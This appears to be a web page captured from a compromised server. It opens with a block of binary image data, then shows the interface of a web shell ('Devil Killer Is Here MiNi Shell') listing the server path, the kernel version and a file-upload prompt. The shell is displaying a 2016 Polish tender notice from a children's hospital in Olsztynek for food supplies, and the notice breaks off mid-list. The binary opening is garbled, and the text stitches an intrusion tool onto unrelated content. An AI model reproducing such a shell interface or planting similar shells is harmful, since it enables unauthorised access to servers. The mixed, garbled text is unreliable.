JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160601/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160601/63831-N-2016.html

<p class="kh_header"><b>Olsztynek: Sukcesywne dostawy art. spożywczych, mięsa wieprzowo - wołowego oraz drobiowego, wędlin, mrożonek owocowo-warzywnych i rybnych</b><br>
<b>Numer ogłoszenia: 63831 - 2016; data zamieszczenia: 01.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Rehabilitacyjny dla Dzieci w Ameryce , Ameryka 21, 11-015 Olsztynek, woj. warmińsko-mazurskie, tel. 089 5194867, 5194810, faks 089 5194813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ameryka.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy art. spożywczych, mięsa wieprzowo - wołowego oraz drobiowego, wędlin, mrożonek owocowo-warzywnych i rybnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr. I MIĘSO 1 Łopatka wp b/k kg. 200 2 Schab wp b/k kg. 700 3 Szynka wp b/k surowa kg. 500 4 Mięso gulaszowe wp.I kg. 600 5 Mięso wp II chude kg. 1 200 Pakiet er. II WĘDLINY 1 Szynkowa grubo rozdrobniona kg 200 2 Mielonka wieprzowa kg 160 3 Ogonówka kg 300 4 Pasztetowa drobiowa kg 420 5 Sląska/podwawelska kg 160 6 Polędwica dr kg 70 7 Polędwica wieprz kg 70 8 Mortadela szynkowa kg 200 9 Kiełbasa szynkowa kg 150 10 Szynka prasowana konserwowa kg 180 11 Szynka got-wędzona kg 300 12 Żywiecka wieprzowa podsuszana kg 380 13 Parówki z indyka podwędzane bez polifosforanów kg 1 500 Pakiet nr.III Mięso drobiowe 1 Ćwiartka tylna z kurczaka kg. 2100 2 Piersi drobiowe (filet) kg. 1000 3 Porcje rosołowe kg. 1300 4 Mięso drobne z indyka kg. 250 5 Mięso drobiowe z kurczaka kg. 350 Pakiet nr.IV Art.Spożywcze 1 Budyń smak wiśniowy brzoskwiniowy opakowanie op.+/-1kg (produkt dopuszczony do spożycia przez dzieci) kg. 200 2 Bazylia kg 2 3 Chrupki kukurydziane op 80g op. 4 500 4 Chrzan tarty 290g kg 15 5 Chrzan śmietankowy op 970g kg 50 6 Kotlety sojowe op 100 op 15 7 kasza jaglana kg 20 8 Cukier biały kryształ op.25kg kg 3 000 9 Cukier biały kryształ op.1 kg kg. 2 000 10 Cukier waniliowy 16g szt 2 300 11 Cukier puder kg 15 12 Cynamon szt 105 13 Dżemy niskosłodzone/czarna porzeczka 290g szt. 200 14 Dżem niskosłodzony aronia z jabł. 290g szt 100 15 Dżem niskosłodzony aronia z jabł. 280g szt. 100 16 Dżem niskosłodzony wiśnia 260g szt 100 17 Dżem niskosłodzony czerwona porzeczka opa.3,5kg kg 50 18 Dżem niskosłodzony aronia opa.3,5kg kg 50 19 Dżem niskosłodzony wiśnia opa.3,5kg kg 50 20 Fasola biała sucha kg. 300 21 Galaretki owocowe smak wiśniowy brzoskwiniowy opakowanieop.1kg (produkt dopuszczony do spożycia przez dzieci) kg. 200 22 Groch suchy połówki kg. 70 23 Herbata czarna expressowa w saszetkach pakowana w kartoniku po 100 szt. Pojedyńcza torebka 1,4g kg 50 24 Herbatniki maślane 100 g.pakowane po 10 szt szt 5 500 25 Kakao 100g niskotłuszczowe min 80% kg 15 26 Kakao 200g niskotłuszczowe min.80% kg 20 27 Kasza gryczana drobna op.1kg kg. 350 28 Kasza jęczmienna średnia, paczkowana op. 1 kg kg. 150 29 Kasza manna op.1 kg kg 230 30 Kawa rozpuszczalna - zbożowa op.1kg kg. 25 31 Kiśle smak wiśniowy brzoskwiniowy, op.1kg produkt dopuszczony do spożycia przez dzieci) kg. 170 32 Koncentrat pomidorowy tylko z pomidorów op.190g 30% bez konserwantów kg 60 33 Koncentrat pomidorowy op. 970g 30% bez konserwantów kg 300 34 Kwasek cytrynowy 20g szt. 530 35 Ketchup 970 / bez konserwantów i niezdrowych wzmacniaczy smaku min.184g pomidorów na 100g Ketchupu) kg 130 36 Ketchup 200g bez konserwantów i niezdrowych wzmacniaczy smaku min .184g pomidorów na 100g Ketchupu kg 50 37 Liść laurowy op.10g kg 2 38 Majonez 815g kg 300 39 Majonez 280g kg 100 40 Mak kg 6 41 Makaron świderki drobne op.500g Durum kg. 300 42 Makaron wstążka op. 400g Durum kg. 180 43 Makaron nitka rosołowa op.500g 4-jajeczny kg. 180 44 Makaron do spagetti 500g mąka razowa kg. 180 45 Makaron zacierka kg 100 46 Mąka pszenna typ.400 op.1kg. kg. 1 600 47 Mąka pszenna typ.400 op.25kg. kg 1 000 48 Mąka ziemniaczana kg. 50 49 Miód pszczeli 400g naturalny/pasieki krajowe/ kg 80 50 Miód pszczeli 1 kg naturalny/pasieki krajowe/ kg 100 51 Majeranek kg 5 52 Musztarda 200g szt 200 53 Marmolada twarda rózana kg 20 54 Ocet spożywczy spirytusowy 10% -0,5L L 260 55 Oregano kg 2 56 Olejki do ciast szt. 50 57 Olej rzepakowy opakowanie 3L L 1 200 58 Olej rzepakowy opakowanie 1L L 100 59 Olej rzepakowy opakowanie 0,5l L 200 60 Olej słonecznikowy op.1 L L 400 61 Pieprz naturalny mielony 500g kg. 22 62 Przyprawa do piernika 20g szt. 20 63 Płatki kuleczki zbożowe smak czekoladowy ChocoChrups zawartość błonnika nie mniejsza niż 5,0 g w 100 g produktu kg 200 64 Kółeczka Honey Chrups kg 200 65 Płatki kuk.miodowo orzechowe zawartość błonnika nie mniejsza niż 3,0 g w 100 g produktu kg 150 66 Paluszki słone op.100g op. 50 67 Płatki kuk.Corn Fles z 5,0 g w 100 g produktu kg 200 68 Płatki owsiane górskie op.500g kg 100 69 Płatki zwykłe kukurydziane kg 150 70 Pieprz czarny / nie mielony op.0,5 kg. kg. 5 71 Pieczywo chrupkie typu Wasa żytnie op.210g opakowanie około 24 kromek op 1 000 72 Pieczywo ryżowe 100g szt 50 73 Proszek do pieczenia 18g szt. 1 000 74 Rodzynki op.1kg kg. 50 75 Ryż paraboliczny op 5kg kg 500 76 Ryż biały paraboliczny op 1kg kg. 100 77 Sól drobnoziarnista jodowana kg. 1 500 78 Sok smaki marchwiowo-owocowy bez cukru 0,9 L szt. 4 000 79 soki 0,33l /op bez konserwantów szt 1 000 80 Sok pomidorowy opak./bez konserwantów l 50 81 Syrop pitny wysokosłodzony 420ml głóg, aronia czarna porzeczka, wiśnia. Malina bez konserwantów szt. 500 82, Suchary bezcukrowe 285g szt. 100, 83 Soda spożywcza 100g szt. 500 84, Słodycze bożonarodzeniowe (mikołaje 100g) szt. 250 85 Ziarno kukurydzy (popcorn) kg. 200 86 Zioła prawensalskie kg 2 87 Zioło angielskie kg 2 88 Zioła Estragon kg 3 Pakiet nr.V Mrożonki owocowo-warzywne oraz rybne 1 Brokuły kg. 300 2 Fasolka szparagowa mroż kg. 130 3 Groszek zielony mrożony kg. 200 4 Kalafior mrożony kg. 200 5 Kukurydza mrożona kg. 170 6 Mieszanka komp.4 składniki kg. 3000 7 Papryka mrożona cięta kg. 100 8 Szpinak kg. 130 9 Filet mrożony / mintaj / bez glazury kg. 700 10 Morszczuk b/glazury kg. 250 11 Filet mrożony / dorsz bez glazury kg. 200 12 Ryba wędzona / makrela kg. 400 13 Truskawka mroż kg. 500 14 Wiśnia bez pestek mroż. kg. 500...</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku, Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia art.22 ust 1ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku, Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia art.22 ust 1ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku, Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia art.22 ust 1ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku, Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia art.22 ust 1ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku, Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia art.22 ust 1ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>.Złożenie ważnej decyzji o dopuszczeniu samochodu do przewozu żywności HDI Dz. U z 2003r. Nr 21 poz.179, którym będzie świadczona usługa, 2.Oświadczenie, że zakład ma wdrożony system HACCP lub GMP i GHP; 3.Formularz ofertowy; 4.Formularz cenowy - stosowny do złożonego pakietu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin zapłaty - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ameryka.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego -Dział administracji szpitala lok.404...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2016 godzina 10:00, miejsce: Recepcja szpitala- parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso wieprzowo-wołowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Łopatka wp b/k kg. 200, 2 Schab wp b/k kg. 700, 3 Szynka wp b/k surowa kg. 500, 4 Mięso gulaszowe wp.I kg. 600, 5 Mięso wp II chude kg. 1 200...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin zapłaty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wędliny wieprzowo-drobiowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Szynkowa grubo rozdrobniona kg 200 2 Mielonka wieprzowa kg 160 3 Ogonówka kg 300 4 Pasztetowa drobiowa kg 420 5 Śląska/podwawelska kg 160 6 Polędwica drobiowa kg 70 7 Polędwica wieprz kg 70 8 Mortadela szynkowa kg 200 9 Kiełbasa szynkowa kg 150 10 Szynka prasowana konserwowa kg 180 11 Szynka gotowana wędzona kg 300 12 Żywiecka wieprzowa podsuszana kg 380 13 Parówki z indyka podwędzane bez polifosforanów kg 1 500...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>

<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin zapłaty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso drobiowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Ćwiartka tylna z kurczaka kg. 2100 2 Piersi drobiowe (filet) kg. 1000 3 Porcje rosołowe kg. 1300 4 Mięso drobne z indyka kg. 250 5 Mięso drobiowe z kurczaka kg. 350...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin zapłaty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Art.spożywcze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1 Budyń smak wiśniowy brzoskwiniowy opakowanie op.+/-1kg (produkt dopuszczony do spożycia przez dzieci) kg. 200 2 Bazylia kg 2 3 Chrupki kukurydziane op 80g op. 4 500 4 Chrzan tarty min.60%korzeń 290g kg 15 5 Chrzan śmietankowy op 970g kg 50 6 Kotlety sojowe op 100 op 15 7 kasza jaglana kg 20 8 Cukier biały kryształ op.25kg kg 3 000 9 Cukier biały kryształ op.1kg kg. 2 000 10 Cukier waniliowy 16g szt 2 300 11 Cukier puder kg 15 12 Cynamon szt 105 13 Dżemy niskosłodzone/czarna porzeczka 290g szt. 200 14 Dżem niskosłodzony aronia z jabł. 290g szt 100 15 Dżem niskosłodzony aronia z jabł. 280g szt. 100 16 Dżem niskosłodzony wiśnia 260g szt 100 17 Dżem niskosłodzony czerwona porzeczka opa.3,5kg kg 50 18 Dżem niskosłodzony aronia opa.3,5kg kg 50 19 Dżem niskosłodzony wiśnia opa.3,5kg kg 50 20 Fasola biała sucha kg. 300 21 Galaretki owocowe smak wiśniowy brzoskwiniowy opakowanieop.1kg (produkt dopuszczony do spożycia przez dzieci) kg. 200 22 Groch suchy połówki kg. 70 23 Herbata czarna expressowa w saszetkach pakowana w kartoniku po 100 szt. Pojedyńcza torebka 1,4g kg 50 24 Herbatniki maślane 100 g.pakowane po 10 szt szt 5 500 25 Kakao 100g niskotłuszczowe min 80% kg 15 26 Kakao 200g niskotłuszczowe min.80% kg 20 27 Kasza gryczana drobna op.1kg kg. 350 28 Kasza jęczmienna średnia, paczkowana op. 1 kg kg. 150 29 Kasza manna op.1 kg kg 230 30 Kawa rozpuszczalna - zbożowa op.1kg kg. 25 31 Kiśle smak wiśniowy brzoskwiniowy, op.1kg produkt dopuszczony do spożycia przez dzieci) kg. 170 32 Koncentrat pomidorowy tylko z pomidorów op.190g 30% bez konserwantów kg 60 33 Koncentrat pomidorowy op. 970g 30% bez konserwantów kg 300 34 Kwasek cytrynowy 20g szt. 530 35 Ketchup 970 / bez konserwantów i niezdrowych wzmacniaczy smaku min.184g pomidorów na 100g Ketchupu) kg 130 36 Ketchup 200g bez konserwantów i niezdrowych wzmacniaczy smaku min .184g pomidorów na 100g Ketchupu kg 50 37 Liść laurowy op.10g kg 2 38 Majonez 815g kg 300 39 Majonez 280g kg 100 40 Mak kg 6 41 Makaron świderki drobne op.500g Durum kg. 300 42 Makaron wstążka op. 400g Durum kg. 180 43 Makaron nitka rosołowa op.500g 4-jajeczny kg. 180 44 Makaron do spagetti 500g mąka razowa kg. 180 45 Makaron zacierka kg 100 46 Mąka pszenna typ.400 op.1kg. kg. 1 600 47 Mąka pszenna typ.400 op.25kg. kg 1 000 48 Mąka ziemniaczana kg. 50 49 Miód pszczeli 400g naturalny/pasieki krajowe/ kg 80 50 Miód pszczeli 1kg naturalny/pasieki krajowe/ kg 100 51 Majeranek kg 5 52 Musztarda 200g szt 200 53 Marmolada twarda rózana kg 20 54 Ocet spożywczy spirytusowy 10% -0,5L L 260 55 Oregano kg 2 56 Olejki do ciast szt. 50 57 Olej rzepakowy opakowanie 3L L 1 200 58 Olej rzepakowy opakowanie 1L L 100 59 Olej rzepakowy opakowanie 0,5l L 200 60 Olej słonecznikowy op.1 L L 400 61 Pieprz naturalny mielony 500g kg. 22 62 Przyprawa do piernika 20g szt. 20 63 Płatki kuleczki zbożowe smak czekoladowy ChocoChrups zawartość błonnika nie mniejsza niż 5,0 g w 100 g produktu kg 200 64 Kółeczka Honey Chrups kg 200 65 Płatki kuk.miodowo orzechowe zawartość błonnika nie mniejsza niż 3,0 g w 100 g produktu kg 150 66 Paluszki słone op.100g op. 50 67 Płatki kuk.Corn Fles z 5,0 g w 100 g produktu kg 200 68 Płatki owsiane górskie op.500g kg 100 69 Płatki zwykłe kukurydziane kg 150 70 Pieprz czarny / nie mielony op.0,5 kg. kg. 5 71 